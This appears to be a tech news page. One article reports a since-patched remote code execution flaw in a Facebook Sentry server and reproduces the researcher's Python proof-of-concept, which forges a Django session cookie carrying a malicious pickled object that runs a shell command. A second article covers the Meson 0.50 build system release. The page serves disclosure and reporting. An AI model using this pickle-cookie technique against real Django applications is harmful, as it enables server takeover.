Another Facebook Vulnerability to be Found

Cybersecurity specialist from SCRT find a way to execute code on Facebook server remotely
27 August 2018   1026

Daniel Le Gall from SCRT, reported about the vulnerability he found in one of the Facebook servers. The problem is in the Sentry web application for logs storage, written in Python using the Django framework. Facebook experts have already patched a security hole in the server.

Daniel found the problem during the scanning of IP addresses of to the social network. On one of them Sentry service was located with host name sentryagreements.thefacebook.com. When reviewing the application, the specialist noticed a stack trace that appears for an unexpected reason, and problems with the user password reset function. According to him, the Django debugging mode was not disabled, so the trace opened the entire environment of the program:

Facebook Vulnerability
Facebook Vulnerability

SCRT expert discovered among the keys of the environment SESSION_SERIALIZER, which was related to the method django.contrib.sessions.serializers.PickleSerializer. Daniel clarified that using a fake session containing arbitrary content of the binary Pickle protocol for serializing objects in Python, you can run any code in the system. To access the session, he needed a secret Django key, which appeared in the list of Sentry settings in plaintext called system.secret-key:

Facebook Vulnerability
Facebook Vulnerability

The researcher wrote a proof-of-concept script that changed the existing contents of sentrysid cookies to an arbitrary object and made the page load for 30 seconds longer:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He sent information about the vulnerability to Facebook team and received $ 5000 under the Bug Bounty program. The company specialists cleared the issue in 10 days after receiving the notification.

Meson 0.50 to be Available

The key development goal of Meson is to ensure a high speed of the assembly process, combined with convenience and ease of use
11 March 2019   168

The release of the Meson 0.50 build system is introduced, which is used to build projects such as X.Org Server, Mesa, Lighttpd, systemd, GStreamer, Wayland, GNOME and GTK +. Meson code is written in Python and comes under the Apache 2.0 license.

The key development goal of Meson is to ensure a high speed of the assembly process, combined with convenience and ease of use. Instead of the make utility, the Ninja toolkit is used in the default build, but other backends can also be used, such as xcode and VisualStudio. A multi-platform dependency handler is built into the system, allowing you to use Meson to build packages for distributions. The build rules are set in a simplified domain-specific language, are well readable and understandable to the user (according to the authors' idea, the developer should spend the least amount of time writing the rules).

Cross-compilation and build on Linux, macOS and Windows using GCC, Clang, Visual Studio and other compilers are supported. Building projects in various programming languages is possible, including C, C ++, Fortran, Java and Rust. An incremental build mode is supported, in which only components directly related to changes made since the last build are reassembled. Meson can be used to form repeatable assemblies, in which the launch of an assembly in different environments leads to the generation of completely identical executable files.